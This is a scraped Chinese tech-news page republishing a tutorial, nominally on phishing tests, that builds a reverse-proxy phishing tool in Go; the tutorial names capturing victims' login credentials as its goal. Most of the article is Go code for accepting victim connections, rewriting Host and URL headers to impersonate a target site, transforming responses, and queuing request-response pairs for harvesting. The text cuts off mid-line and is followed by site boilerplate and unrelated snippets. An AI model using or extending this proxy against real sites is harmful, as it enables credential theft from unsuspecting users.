In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
今天就跟大家聊聊有关如何在中使用反向代理进行网络钓鱼测试,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
对于一个攻击者来说,要想实施一次网络钓鱼攻击,往往需要做大量的准备工作。例如搭建钓鱼站点,引诱受害者上钩,捕获受害者的登录凭证等。我将教大家使用Go自动化这些过程。
代理被用来钓鱼TechOnRoad用户。你能看出它们之间的差别吗?
使用代理进行网络钓鱼
我们的代理需要接收来自受害者的请求,并在发送到目标网站之前重写它们。Go有着许多在原生层面对并发编程进行支持的优秀特性,比如Goroutines、Channels等。我们建立了一个简单的TCP侦听器,spawn了一个新的goroutine来处理每个传入的连接和一个goroutine worker来处理请求和响应。结果通过channel从请求处理goroutine传递给worker。
// HTTPTransaction represents a complete request - response flow.type HTTPTransaction struct { Request *http.Request Response *http.Response}// PhishingProxy proxies requests between the victim and the target, queuing requests and responses for further processing.type PhishingProxy struct { client *http.Client targetURL *url.URL responseTransformers []ResponseTransformer}func main() { // ... flag parsing and whatnot phishingProxy := &PhishingProxy{ client: client, targetURL: u, responseTransformers: responseTransformers, } transactions := make(chan *HTTPTransaction) go processTransactions(transactions) for { conn, err := server.Accept() if err != nil { log.Println("Error when accepting request,", err.Error()) } go phishingProxy.HandleConnection(conn, transactions) }}
由于Go的优秀标准库,请求处理非常简洁。http包提供ReadRequest方法,用于解析从连接中读取数据的请求。
defer conn.Close()reader := bufio.NewReader(conn)request, err := http.ReadRequest(reader)if err != nil { log.Println("Error parsing request:", err.Error()) return}
将所有内容解析成Golang http.Request后,我们将它传递给目标。代理需要重写来自受害者的HTTP头,以防止目标站点连接中断,特别是主机头和URL。
request.URL.Scheme = p.targetURL.Schemerequest.URL.Host = p.targetURL.Hostrequest.Host = p.targetURL.Hostrequest.RequestURI = ""resp, err := p.client.Do(request)if err != nil { log.Println("Proxy error:", err.Error()) return}
在代理上使用HTTP客户端,我们发起请求并确保请求成功。
一旦我们得到响应,我们使用传递给代理的ResponseTransformers(后面会详细介绍)转换它,使用标准库httputil.DumpResponse函数将响应转换为字节,并将请求和响应发送给goroutine worker之后处理。
for _, transformer := range p.responseTransformers { transformer.Transform(resp)}modifiedResponse, err := httputil.DumpResponse(resp, true)if err != nil { log.Println("Error converting requests to bytes:", err.Error()) return}_, err = conn.Write(modifiedResponse)if err != nil { log.Println("Error responding to victim:", err.Error()) return}transactions
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.